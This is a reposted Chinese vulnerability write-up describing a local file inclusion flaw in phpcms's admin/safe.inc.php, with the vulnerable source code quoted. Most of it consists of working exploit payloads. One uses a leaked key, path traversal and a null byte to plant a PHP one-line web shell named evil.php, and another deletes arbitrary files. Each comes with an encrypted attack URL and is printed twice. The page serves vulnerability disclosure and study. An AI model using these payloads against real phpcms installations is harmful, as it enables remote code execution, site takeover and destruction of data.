碼上歡樂
相關內容    簡體    繁體

phpcms本地包含漏洞導致的寫shell漏洞和刪除任意文件漏洞

本文轉載自   查看原文   2015-10-09 10:33   1771    漏洞信息

phpcms本地包含類漏洞,如果該文件包含了/include/common.inc.php就可以包含執行很多后台才能執行的文件了。

由於phpcms的全局變量機制,導致能拿shell的方法很多,類似的問題不止一個。

admin/safe.inc.php文件是后台掃木馬的程序,但是很可惜的是雖然文件名叫做safe,但是一點也不safe。

公布一個本地包含秒殺拿shell的方法。

包含:admin/safe.inc.php文件GET提交一下數據
將在根目錄下生成一句話
用上一篇得到的密鑰$key='sIpeofogblFVCildZEwe';
加密如下字符串

$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
將在根目錄下生成一句話木馬

同理任意文件刪除漏洞:
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==

貼上存在漏洞的代碼://admin/safe.inc.php

<?php 



defined('IN_PHPCMS') or exit('Access Denied');

// include/common.inc.php 里面聲明了常量

// define('IN_PHPCMS', TRUE);





if(empty($action)) $action = "start";



$safe = cache_read('safe.php');



$filecheck = load('filecheck.class.php');



if(empty($safe))



{



$safe = array (



'file_type' => 'php|js',



'code' => '',



'func' => 'com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress',



'dir' => $filecheck->checked_dirs()



);



}



switch ($action)



{

...

case 'edit_code':



if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))



{



showmessage('修改成功!');



}



break;







case 'del_file':



$file_path = urldecode($files);





if (empty($file_path)) 



{



showmessage('請選擇文件');



}



$file_list = cache_read('scan_backdoor.php');



unset($file_list[$file_path]);



cache_write('scan_backdoor.php',$file_list);



@unlink(PHPCMS_ROOT.$file_path);



showmessage('文件刪除成功!', '?mod=phpcms&file=safe&action=scan_table');



break;

...

漏洞證明:

將在根目錄下生成一句話

用上一篇得到的密鑰$key='sIpeofogblFVCildZEwe';

加密如下字符串



$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';



http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

將在根目錄下生成一句話木馬



同理任意文件刪除漏洞:

$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 ThinkCMFX任意文件包含漏洞(學習) phpcms v9.6.0任意文件上傳漏洞 最新PHPcms9.6.0 任意文件上傳漏洞 通達OA 任意文件上傳+文件包含導致RCE漏洞復現 通達OA任意文件上傳+文件包含RCE漏洞復現(附自寫EXP) 騎士cms < 6.0.48任意文件包含漏洞簡記 Wordpress<=4.9.6 任意文件刪除漏洞復現分析 【研究】Discuz<3.4任意文件刪除漏洞 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞分析 任意文件下載漏洞學習
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM